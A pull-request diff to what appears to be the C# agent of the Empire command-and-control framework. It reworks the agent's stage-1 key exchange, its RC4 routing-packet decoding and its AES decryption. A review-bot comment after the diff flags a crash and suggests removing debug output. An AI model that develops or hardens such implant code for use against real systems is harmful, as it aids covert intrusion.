Update C# agent to use DH keys and wrap routing packets #7

Open
wants to merge 9 commits into
base: v6.0-dev
fixed stage 1 aes
Cx01N committed Feb 28, 2025
commit f4f503dffc1ade0d8fafd1977c656d101d51884f
45 changes: 23 additions & 22 deletions Sharpire/Empire.Agent.Stager.cs
Expand Up @@ -267,14 +267,10 @@ private byte[] Stage1()

// Receive Server Response
RoutingPacket packet = DecodeRoutingPacket(response);
if (packet == null || packet.DecryptedData.Length == 0)
{
Console.WriteLine("Failed to decode routing packet.");
return null;
}
this.sessionInfo.SetAgentID(packet.SessionId);

// Extract and Generate Shared Secret
byte[] decryptedData = AesDecryptAndVerify(stagingKeyBytes, packet.DecryptedData);
byte[] decryptedData = AesDecryptAndVerify(stagingKeyBytes, packet.EncryptedData);
byte[] nonce = decryptedData.Take(16).ToArray();
byte[] serverPubKey = decryptedData.Skip(16).ToArray();

Expand All @@ -284,7 +280,6 @@ private byte[] Stage1()
return nonce;
}


private RoutingPacket DecodeRoutingPacket(byte[] packetData)
{
if (packetData.Length < 20)
Expand All @@ -294,6 +289,7 @@ private RoutingPacket DecodeRoutingPacket(byte[] packetData)
}

int offset = 0;

while (offset < packetData.Length)
{
byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
Expand All @@ -304,43 +300,46 @@ private RoutingPacket DecodeRoutingPacket(byte[] packetData)
byte[] stagingKey = sessionInfo.GetStagingKeyBytes();
byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKey);

Console.WriteLine($"Full Packet Data Length: {packetData.Length}");
Console.WriteLine($"Encrypted Data Length: {routingEncryptedData.Length}");
Console.WriteLine($"RC4 Key Length: {rc4Key.Length}");

// ✅ Decrypt the first 20 bytes using RC4
byte[] routingData = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
Console.WriteLine($"Decrypted Routing Data Length: {routingData.Length}");
Console.WriteLine("Decrypted Routing Data (Hex): " + BitConverter.ToString(routingData.Take(32).ToArray()));

if (routingData.Length < 16)
{
Console.WriteLine($"Decryption failed, output length: {routingData.Length}");
return null;
}

// ✅ Extract fields from the decrypted Routing Data
string packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());

byte language = 0;
byte metaData = 0;
try
{
language = routingPacket[8];
metaData = routingPacket[9];
}
catch (IndexOutOfRangeException)
{
}

byte[] extra = routingPacket.Skip(10).Take(2).ToArray();
byte language = routingData[8];
byte metaData = routingData[9];
byte[] extra = routingData.Skip(10).Take(2).ToArray();
uint packetLength = BitConverter.ToUInt32(routingData, 12);
Console.WriteLine($"Extracted Packet Length: {packetLength}");

if (packetLength == 0)
if (packetLength == 0 || packetLength > packetData.Length - offset)
{
Console.WriteLine("Invalid packet length.");
return null;
}

// ✅ Extract the remaining **AES-encrypted** data
byte[] encryptedData = packetData.Skip(offset).Take((int)packetLength).ToArray();
Console.WriteLine($"Extracted Encrypted Data Length: {encryptedData.Length}");


return new RoutingPacket
{
InitializationVector = routingInitializationVector,
EncryptedData = routingEncryptedData,
DecryptedData = routingData,
EncryptedData = encryptedData,
DecryptedData = null,
SessionId = packetSessionId,
Language = language,
MetaData = metaData,
Expand All @@ -352,6 +351,7 @@ private RoutingPacket DecodeRoutingPacket(byte[] packetData)
return null;
}


////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
Expand Down Expand Up @@ -642,6 +642,7 @@ public static byte[] aesDecrypt(byte[] key, byte[] data)
using (AesCryptoServiceProvider aesCrypto = new AesCryptoServiceProvider())
{
aesCrypto.Mode = CipherMode.CBC;
aesCrypto.Padding = PaddingMode.PKCS7;
aesCrypto.Key = key;
aesCrypto.IV = iv;
return aesCrypto.CreateDecryptor().TransformFinalBlock(cipherText, 0, cipherText.Length);
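Review bot: Stage1 now dereferences `packet` unconditionally at `this.sessionInfo.SetAgentID(packet.SessionId)` after the old null guard was dropped, yet DecodeRoutingPacket still returns null for a short packet, an RC4 output under 16 bytes and an invalid length, so a truncated or malformed server response crashes the agent with a NullReferenceException instead of returning null. The old guard was checking `DecryptedData`, which the new RoutingPacket always sets to null, so it had to go, but it should be replaced with a check on the field that is now populated: `if (packet == null || packet.EncryptedData == null || packet.EncryptedData.Length == 0) { return null; }` before the SetAgentID call. Separately, the added Console.WriteLine calls in DecodeRoutingPacket print the decrypted routing header in hex, including the session id, to stdout, which on an agent is debug output worth removing or gating behind a debug flag before merge. Stage1 begins before the first hunk, so its earlier lines are not visible here.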